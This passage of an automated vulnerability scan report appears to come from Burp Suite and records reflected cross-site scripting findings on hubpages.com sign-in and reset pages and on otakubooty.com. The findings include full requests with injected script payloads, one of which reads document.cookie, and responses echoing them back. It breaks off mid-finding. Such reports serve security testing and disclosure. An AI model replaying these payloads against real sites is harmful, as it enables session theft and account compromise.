Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.38. https://hubpages.com/signin/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567de"><script>alert(1)</script>49cf52049d9a5294c was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high567de"><script>alert(1)</script>49cf52049d9a5294c&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.39. https://hubpages.com/signin/ [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6bba"><script>alert(1)</script>4d65f9ca019 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.40. https://hubpages.com/signin/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9a0"><script>alert(1)</script>dcbf5fa54aab84836 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsfd9a0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcbf5fa54aab84836; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.41. https://hubpages.com/signin/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c59"><script>alert(1)</script>1de617bf248 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:37 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsd5c59%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1de617bf248; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.42. https://hubpages.com/signin/reset/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ae0"><script>alert(1)</script>bfb058226eeddffe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email=', 'Page not found'); return false;">
...[SNIP]...

2.43. https://hubpages.com/signin/reset/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9430"><script>alert(1)</script>d04be060a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinc9430"><script>alert(1)</script>d04be060a2d/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinc9430"><script>alert(1)</script>d04be060a2d/reset/', 'Page not found'); return false;">
...[SNIP]...

2.44. https://hubpages.com/signin/reset/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b00"><script>alert(1)</script>db9cbd8e43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset61b00"><script>alert(1)</script>db9cbd8e43/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/', 'Page not found'); return false;">
...[SNIP]...

2.45. https://hubpages.com/signin/reset/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bce"><script>alert(1)</script>e3e68d52e9c6e238a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:29 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email=', 'Page not found'); return false;">
...[SNIP]...

2.46. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca6"><script>alert(1)</script>e2a9419b373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:59 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1', 'Reset Your HubPages Password'); return false;">
...[SNIP]...

2.47. http://otakubooty.com/Default.asp [login parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The value of the login request parameter is copied into an HTML comment. The payload 9773a--><script>alert(1)</script>8fb4053a2af was submitted in the login parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Default.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp??a5011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E76b5e899461=1
Cache-Control: max-age=0
Origin: http://otakubooty.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; password=; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.2.10.1297459802
Content-Length: 29

action=login&login=9773a--><script>alert(1)</script>8fb4053a2af&password=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 32284


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] Logging in via form. username=9773a--><script>alert(1)</script>8fb4053a2af -->

<!-- SUPER SECRET DEBUG OUTPUT [ProcessLoginRS] Login result:
...[SNIP]...

2.48. http://otakubooty.com/Default.asp [login parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The value of the login request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e40"><script>alert(1)</script>e1430befcb2e74bb5 was submitted in the login parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Default.asp?action=login&login=72e40"><script>alert(1)</script>e1430befcb2e74bb5&password= HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp??a5011%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E76b5e899461=1
Cache-Control: max-age=0
Origin: http://otakubooty.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; password=; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.2.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:32 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 35320


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/Default.asp?action=login&amp;login=72e40"><script>alert(1)</script>e1430befcb2e74bb5&amp;password=&amp;fa=nf">
...[SNIP]...

2.49. http://otakubooty.com/Default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5011"><script>alert(1)</script>76b5e899461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Default.asp??a5011"><script>alert(1)</script>76b5e899461=1 HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:47 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=FELOGNJCMJCBMPLBCMMHHOKN; path=/
Vary: Accept-Encoding
Content-Length: 33857


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="/Default.asp??a5011"><script>alert(1)</script>76b5e899461=1&amp;fa=nf">
...[SNIP]...

2.50. http://otakubooty.com/oa.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5243f"><script>alert(1)</script>8b6b5d9edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oa.asp?5243f"><script>alert(1)</script>8b6b5d9edb2=1 HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13331
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
<form action="/oa.asp?5243f"><script>alert(1)</script>8b6b5d9edb2=1" method=POST>
...[SNIP]...

2.51. http://otakubooty.com/of.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /of.asp

Issue detail

